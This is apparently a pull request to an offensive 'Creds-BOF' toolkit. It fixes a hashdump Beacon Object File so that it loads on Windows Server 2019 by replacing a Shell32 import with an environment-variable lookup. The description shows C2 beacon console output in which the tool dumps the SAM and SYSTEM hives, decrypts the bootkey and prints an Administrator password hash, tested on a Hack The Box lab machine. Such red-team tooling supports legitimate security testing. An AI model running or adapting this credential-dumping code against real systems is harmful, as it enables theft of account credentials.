### PR TITLE
Fix hashdump for Windows Server 2019

### DIFF
--- a/Creds-BOF/hashdump/bofdefs.h
+++ b/Creds-BOF/hashdump/bofdefs.h
@@ -38,7 +38,7 @@ DECLSPEC_IMPORT LSTATUS WINAPI Advapi32$RegUnLoadKeyA(HKEY hKey, LPCSTR lpSubKey
 DECLSPEC_IMPORT LONG WINAPI Advapi32$RegQueryInfoKeyW(HKEY hKey, LPWSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcMaxSubKeyLen, LPDWORD lpcMaxClassLen, LPDWORD lpcValues, LPDWORD lpcMaxValueNameLen, LPDWORD lpcMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime);
 DECLSPEC_IMPORT LSTATUS WINAPI Advapi32$RegOpenKeyW(HKEY hKey, LPCWSTR lpSubKey, PHKEY phkResult);
 
-DECLSPEC_IMPORT HRESULT WINAPI Shell32$SHGetFolderPathA(HWND hwnd, int csidl, HANDLE hToken, DWORD dwFlags, LPSTR pszPath);
+// DECLSPEC_IMPORT HRESULT WINAPI Shell32$SHGetFolderPathA(HWND hwnd, int csidl, HANDLE hToken, DWORD dwFlags, LPSTR pszPath);
 
 // Bcrypt
 DECLSPEC_IMPORT NTSTATUS WINAPI bcrypt$BCryptOpenAlgorithmProvider(BCRYPT_ALG_HANDLE *phAlgorithm, LPCWSTR pszAlgId, LPCWSTR pszImplementation, ULONG dwFlags);

--- a/Creds-BOF/hashdump/hashdump.c
+++ b/Creds-BOF/hashdump/hashdump.c
@@ -2,7 +2,6 @@
 #include <windows.h>
 #include "bofdefs.h"
 #include "hive_parser.c"
-#include <shlobj.h>
 #include "../_include/bofdefs.h"
 #include "../_include/beacon.h"
 
@@ -229,8 +228,10 @@ void InitializeBackupPaths()
 
     char basePath[MAX_PATH];
     // Get AppData\Local path
-    if (!SUCCEEDED(Shell32$SHGetFolderPathA(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, basePath)))
+    DWORD envLen = Kernel32$GetEnvironmentVariableA("LOCALAPPDATA", basePath, MAX_PATH);
+    if (envLen == 0 || envLen >= MAX_PATH) {
         MSVCRT$strcpy_s(basePath, MAX_PATH, "C:\\temp"); // Fallback
+    }
 
     char randPart1[9], randPart2[9];
     GenerateRandomString(randPart1, 8); // 8-character random string


### PR DESCRIPTION
Apparently, hashdump was not working for Windows Server 2019

Before:
```
[20/09 01:02:18] Operator [f806a67a] beacon > hashdump
[20/09 01:02:18] [*] BOF implementation: hashdump
[20/09 01:02:18] [*] Agent called server, sent [16.31 Kb]
[20/09 01:02:18] [-] BOF error
Symbol not found: __imp_Shell32$SHGetFolderPathA
[20/09 01:02:18] [+] BOF finished

+--- Task [f806a67a] closed ----------------------------------------------------------+
```
After:
```
[20/09 02:09:16] Operator [e5f325d5] beacon > hashdump
[20/09 02:09:16] [*] BOF implementation: hashdump
[20/09 02:09:17] [*] Agent called server, sent [17.45 Kb]
[20/09 02:09:18] [+] BOF output
[HASHDUMP] Dumped SAM and SYSTEM
[HASHDUMP] Found current control set: 1
[HASHDUMP] Bootkey: 6f961da31c7ffaf16683f78e04c3e03d
[HASHDUMP] Decrypted bootkey: 6ff387c78766517b82b0e52689fdd859
Administrator:500:f1285edf781e0ac5d390036170bf98d5
[20/09 02:09:18] [+] BOF finished

+--- Task [e5f325d5] closed ----------------------------------------------------------+
```

Tested on "Flight" machine on HTB and Windows 10